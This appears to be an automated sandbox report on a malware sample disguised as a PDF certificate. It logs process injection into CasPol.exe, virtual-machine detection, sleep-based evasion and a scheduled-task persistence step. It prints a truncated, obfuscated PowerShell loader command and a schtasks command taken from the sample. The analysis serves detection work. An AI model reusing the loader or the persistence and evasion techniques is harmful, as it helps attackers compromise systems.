      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeFile opened: C:\Windows\resources\0409\Praktikerens\Ssygt\Adobos\Arbejdsstykker.ini count: 82170Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeAPI/Special instruction interceptor: Address: 458F450
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEDAI\0
      Source: powershell.exe, 00000004.00000002.24023428377.0000000008B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE&
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: 219A0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: 219A0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: 239A0000 memory commit | memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: 4ED0000 memory commit | memory reserve | memory write watchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9931Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9922Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 8028Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: foregroundWindowGot 1694Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep count: 9922 > 30Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7804Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6268Thread sleep time: -74500s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6268Thread sleep time: -4014000s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2984Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: powershell.exe, 00000004.00000002.24023428377.0000000008B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe&
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exedaI\0
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3525
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0323D7E4 LdrInitializeThunk,4_2_0323D7E4
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: B00000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4FJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#fordaervet kauch ticklenburg synonymized nippers hysse #>$boarspear = """pe;ref susunskc otpri po cn d aebcartju cd kg coasmsemdee m0wa4 k b{st do tr u kopteafor oaatmno(ov[haspot fr uislnspgvo] h`$pis ca ulsteans fwdio om fe un p)re; d de d a d`$ rt fh vichoopt ch wr ti ex t no= r snnoeinwud-ocoreb ujfoe scgotoc mebmiyldtprein[fo] p sc(ib`$ csspa ll ueens mwseogdm bedynan.inl de an bgjot ch p fo/co a2su) i; d ma sc f flffyoslrme(sc`$ pa dnpitpai flmuatrbaso prsks k=pa0ra;bi b`$baa nn gtpoi llsparabhvo srbls v pr- ml atbo fa`$pasdia slopebaslew so sm ze mnsl.lylvaedrn yg ft dh t;il lf`$ pa pnhyt ci nlekatabfiostrsks c+ i=li2an)af{ku d sk e st ku pe fo fa`$ekt bhsei sogutbehinr uivaxun[ta`$biayondat sirelima abguo nr ws t/ t2 p] f no= o pa[uncgloinn bvpye sruntse]im: u:cattho pbsyyantaueun(fj`$ ss ia tl semes fw bo bmfoebonsu.kls au kb ss mtlor tispnang z(st`$phaunnsatbui hlfoamybmiosortus d, i er2un) g,in au1mu6ca)mi;en re ti`$ret fh siroofit sh prsoi dxsv[ar`$gaacintrtedi slbra nbino or asta/tr2sk]br p=ud un(su`$satithefibao ct bhalrfli txga[pa`$snawinbrt ciunlkraodbmeo arhlsmi/sp2vi]br l-fobvaxspoderca k1 s1fo8mb) f;sy p l y ty}re ki[ dsent sr fiannstgsl]st[sas kygis lt ue fmpa. stple pxgotab. sebrnsuc ko rdafiunn pg b] k: s: ra is scsli lino.teg de btamsditpur zi pnhag t(ca`$datgrhciiscountruhrorusisax m)as;dd} s`$vis pkoarfim ga ar mbmae sjamd re osep0 o=inbderbauvid sgnooinmhymskeda0ar4 i bo' d2ek5nu0stffa0hu5 s0un2dj1 u3de1 tb k5cl8 t1ma2 i1 naan1biape' s;pr`$ ksudklarmum jaudrafb reklj adakebrsst1fo=gobbrr putrdpegprolam pmame p0gu4 r uf' r3mibbl1ynfas1 r5ec0my4 m1 s9ro0de5 s1bj9 n1 h0ga0 u2 m5ra8no2 a1de1 sfto1 i8 r4op5 r4pa4ni5 s8 j2 o3st1ko8 s0be5in1in7ud1ov0fo1 b3 s3un8bi1 l7 l0 k2fl1 mf e0ma0ov1qu3ge3 bber1de3cl0fi2 k1 oesc1 b9 l1 a2 m0 b5ko'ou; f`$sls skhkrstm caanr ubexe ajkodtre assk2ge= fbgar suscdimgskokam sm depr0co4br sa' a3 s1ko1sj3ja0 s2un2 l6sc0bu4 m1be9 i1 g5 d3sp7 s1dy2wi1 s2 g0 e4 p1in3 a0 v5bt0bu5in'mo;sm`$prssik irgrmafa arunbste sjmodpievas h3av=pjb mr bu udolg wowim mm me u0ha4 s de' f2 v5sw0obfas0fo5 b0 s2ma1 s3 s1 fbmo5do8ge2v 4us0 a3 s1 m8xa0sl2fl1vef s1deb q1 u3ma5 a8re3anfwi1 g8 t0 d2sy1po3ny0 d4bo1 e9 s0fo6 p2av5 l1re3un0sn4ag0co0ba1 ff t1 p5 o1ke3 c0bo5 o5un8no3 se p1re7 t1nu8vr1gr2 r1mia s1ra3ge2un4 u1ov3 c1ud0hd'ro;ru`$jos ukafr sm iasermob iefljuddwiefes g4 k= ib krdrutiddegnoo cmbim kewa0 p4ru se'te0di5re0un2pr0co4 r1brfsp1se8 g1fl1pu'il;se`$kesfukufrthm na lrvib se fj udpaebasan5un=stbdyr au tdsjg pokumldm te l0im4lo ne'gy3pe1bl1 d3hy0br2ko3libpa1be9ma1vi2tr0su3se1 pa t1 m3mo3haesu1no7gr1 r8 t1ke2st1 sa u1st3 v'ji;tr`$bestakmir hmdoa frsvbvieoljlad cetrsaf6 d=peb crmau rdregmio wm bmboe u0bl4 f my' v2rn4ge2ge2 g2cl5 a0on6 f1ti3ap1hj5sj1atfsk1 f7 t1 ma s3 c8 m1 n7ok1 tb e1fo3 b5praut5eu6dv3 ve s1 if e1bo2hy1 v3 a3 e4 b0rofre2fa5 o1 afal1fa1te5boa i5be6 h2 r6 b0su3sm1 g4f
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#fordaervet kauch ticklenburg synonymized nippers hysse #>$boarspear = """pe;ref susunskc otpri po cn d aebcartju cd kg coasmsemdee m0wa4 k b{st do tr u kopteafor oaatmno(ov[haspot fr uislnspgvo] h`$pis ca ulsteans fwdio om fe un p)re; d de d a d`$ rt fh vichoopt ch wr ti ex t no= r snnoeinwud-ocoreb ujfoe scgotoc mebmiyldtprein[fo] p sc(ib`$ csspa ll ueens mwseogdm bedynan.inl de an bgjot ch p fo/co a2su) i; d ma sc f flffyoslrme(sc`$ pa dnpitpai flmuatrbaso prsks k=pa0ra;bi b`$baa nn gtpoi llsparabhvo srbls v pr- ml atbo fa`$pasdia slopebaslew so sm ze mnsl.lylvaedrn yg ft dh t;il lf`$ pa pnhyt ci nlekatabfiostrsks c+ i=li2an)af{ku d sk e st ku pe fo fa`$ekt bhsei sogutbehinr uivaxun[ta`$biayondat sirelima abguo nr ws t/ t2 p] f no= o pa[uncgloinn bvpye sruntse]im: u:cattho pbsyyantaueun(fj`$ ss ia tl semes fw bo bmfoebonsu.kls au kb ss mtlor tispnang z(st`$phaunnsatbui hlfoamybmiosortus d, i er2un) g,in au1mu6ca)mi;en re ti`$ret fh siroofit sh prsoi dxsv[ar`$gaacintrtedi slbra nbino or asta/tr2sk]br p=ud un(su`$satithefibao ct bhalrfli txga[pa`$snawinbrt ciunlkraodbmeo arhlsmi/sp2vi]br l-fobvaxspoderca k1 s1fo8mb) f;sy p l y ty}re ki[ dsent sr fiannstgsl]st[sas kygis lt ue fmpa. stple pxgotab. sebrnsuc ko rdafiunn pg b] k: s: ra is scsli lino.teg de btamsditpur zi pnhag t(ca`$datgrhciiscountruhrorusisax m)as;dd} s`$vis pkoarfim ga ar mbmae sjamd re osep0 o=inbderbauvid sgnooinmhymskeda0ar4 i bo' d2ek5nu0stffa0hu5 s0un2dj1 u3de1 tb k5cl8 t1ma2 i1 naan1biape' s;pr`$ ksudklarmum jaudrafb reklj adakebrsst1fo=gobbrr putrdpegprolam pmame p0gu4 r uf' r3mibbl1ynfas1 r5ec0my4 m1 s9ro0de5 s1bj9 n1 h0ga0 u2 m5ra8no2 a1de1 sfto1 i8 r4op5 r4pa4ni5 s8 j2 o3st1ko8 s0be5in1in7ud1ov0fo1 b3 s3un8bi1 l7 l0 k2fl1 mf e0ma0ov1qu3ge3 bber1de3cl0fi2 k1 oesc1 b9 l1 a2 m0 b5ko'ou; f`$sls skhkrstm caanr ubexe ajkodtre assk2ge= fbgar suscdimgskokam sm depr0co4br sa' a3 s1ko1sj3ja0 s2un2 l6sc0bu4 m1be9 i1 g5 d3sp7 s1dy2wi1 s2 g0 e4 p1in3 a0 v5bt0bu5in'mo;sm`$prssik irgrmafa arunbste sjmodpievas h3av=pjb mr bu udolg wowim mm me u0ha4 s de' f2 v5sw0obfas0fo5 b0 s2ma1 s3 s1 fbmo5do8ge2v 4us0 a3 s1 m8xa0sl2fl1vef s1deb q1 u3ma5 a8re3anfwi1 g8 t0 d2sy1po3ny0 d4bo1 e9 s0fo6 p2av5 l1re3un0sn4ag0co0ba1 ff t1 p5 o1ke3 c0bo5 o5un8no3 se p1re7 t1nu8vr1gr2 r1mia s1ra3ge2un4 u1ov3 c1ud0hd'ro;ru`$jos ukafr sm iasermob iefljuddwiefes g4 k= ib krdrutiddegnoo cmbim kewa0 p4ru se'te0di5re0un2pr0co4 r1brfsp1se8 g1fl1pu'il;se`$kesfukufrthm na lrvib se fj udpaebasan5un=stbdyr au tdsjg pokumldm te l0im4lo ne'gy3pe1bl1 d3hy0br2ko3libpa1be9ma1vi2tr0su3se1 pa t1 m3mo3haesu1no7gr1 r8 t1ke2st1 sa u1st3 v'ji;tr`$bestakmir hmdoa frsvbvieoljlad cetrsaf6 d=peb crmau rdregmio wm bmboe u0bl4 f my' v2rn4ge2ge2 g2cl5 a0on6 f1ti3ap1hj5sj1atfsk1 f7 t1 ma s3 c8 m1 n7ok1 tb e1fo3 b5praut5eu6dv3 ve s1 if e1bo2hy1 v3 a3 e4 b0rofre2fa5 o1 afal1fa1te5boa i5be6 h2 r6 b0su3sm1 g4fJump to behavior
      Source: CasPol.exe, 00000005.00000002.28419341810.0000000023D70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Program Managerknown.
      Source: CasPol.exe, 00000005.00000002.28397844456.0000000021F17000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28419341810.0000000023D70000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: CasPol.exe, 00000005.00000002.28397844456.0000000021BAB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F2B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerpo%
      Source: CasPol.exe, 00000005.00000002.28397844456.00000000219F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp
      Source: CasPol.exe, 00000005.00000002.28420339786.0000000023DDC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Program Manager
      Source: CasPol.exe, 00000005.00000002.28420600342.0000000023DF7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
      Source: CasPol.exe, 00000005.00000002.28397844456.0000000021F2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerr
      Source: CasPol.exe, 00000005.00000002.28420600342.0000000023DFC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023DE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:55db;192.168.11.20
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
